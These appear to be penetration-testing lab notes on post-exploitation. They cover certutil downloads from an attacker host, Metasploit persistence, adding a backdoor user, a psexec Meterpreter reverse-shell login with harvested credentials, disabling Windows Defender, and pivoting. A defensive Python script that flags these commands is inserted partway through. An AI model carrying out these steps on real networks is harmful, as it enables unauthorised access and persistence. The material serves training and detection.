Post Exploitation
--------------------------------------------------Introduction------------------------------------
*Talk about file transfer, maintaining access, pivoting lab
*hacker or Red Teamer
-------------------------------------------------File Transfers Review-------------------------------
Certutil
$certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt
HTTP
$python -m SimpleHTTPServer 80
FTP
*python -m pyftpdlib 21 (attacker machine)
Linux
wget
----------------------------------------------------Maintaining Access-----------------------------------
*Persistence Scripts
$run persistence -h
$exploit/windows/local/persistence
$exploit/windows/local/registry_persistence
*Scheduled Tasks
$run scheduleme
$run schtasksabuse
*Add a user
$net user hacker password123 /add
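The certutil download in the File Transfers section and the scheduled-task and add-a-user persistence above all leave process-creation events a defender can alert on. The following is an added example, not part of these notes: a small Python triage over constructed Sysmon-style process events; the rule names, field layout and sample lines are assumptions.

```python
import re

# Constructed sample process-creation events in a Sysmon Event ID 1 / Windows 4688
# style: (parent image, image, command line). Not taken from any real host.
SAMPLE_EVENTS = [
    ("cmd.exe", "certutil.exe",
     "certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt"),
    ("cmd.exe", "net.exe", "net user hacker password123 /add"),
    ("cmd.exe", "schtasks.exe",
     'schtasks /create /sc minute /mo 5 /tn updater /tr "C:\\Users\\Public\\a.exe"'),
    # Benign-looking certutil use: no -urlcache download, should not alert.
    ("explorer.exe", "certutil.exe", "certutil.exe -verify -urlfetch cert.cer"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# Each rule keys on the command-line shape used in the notes; rule names are ours.
RULES = [
    # certutil used as a downloader (the file-transfer trick in the notes).
    ("certutil-download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    # Local account creation via net/net1 (also visible as Security event 4720).
    ("local-account-add",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I)),
    # Scheduled task creation (also visible as Security event 4698 when audited).
    ("scheduled-task-create",
     re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)),
]


def classify(event):
    """Return the names of every rule whose pattern matches the command line."""
    _parent, _image, cmdline = event
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def triage(events):
    """Return (rule, parent, image, cmdline) for each rule hit across the events."""
    alerts = []
    for parent, image, cmdline in events:
        for rule in classify((parent, image, cmdline)):
            alerts.append((rule, parent, image, cmdline))
    return alerts


if __name__ == "__main__":
    for rule, parent, image, cmdline in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {parent} -> {image}: {cmdline}")
```

The parent image is carried through so an analyst can see, for instance, that a shell rather than an installer spawned certutil; the cleanup steps at the end of these notes are exactly what these alerts help verify.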
----------------------------------------------------Pivoting lab Setup---------------------------------------
We are going to modify the lab networking.
PIVOTING:
In penetration testing, pivoting is the act of using a compromised system to spread between
different computer systems once inside the network, simulating the behavior of a real attacker.
This compromised machine is sometimes referred to as the “instance,” “plant,” or “foothold.”
Configure the IP addresses for the different machines.
---------------------------------------------------Pivoting Walkthrough--------------------------------------
In the Kali machine:
$msfconsole
$use exploit/windows/smb/psexec
$options
$set rhosts 192.168.57.141
$set smbdomain marvel.local
$set smbpass Password1
$set smbuser fcastle
$set payload windows/x64/meterpreter/reverse_tcp
$set lhost eth0
$options
$set target 2
Windows Defender detected it, so turn it off
$run
We got the shell.
$shell
$route print
$arp -a
$go out of the shell
$run autoroute -s 10.10.10.0/24
$run autoroute -p
$background (keeps the session running in the background)
$search portscan
$use 5
$options
$set rhosts 10.10.10.129
$set port 445
$run
-------------------------------------------------------------CLEANUP-----------------------------------------------
*make the system/network as it was when you entered it
*remove executables, scripts and added files
*remove malware
*set settings back to original configurations
------------------------------------------------------------------------------------------------------------------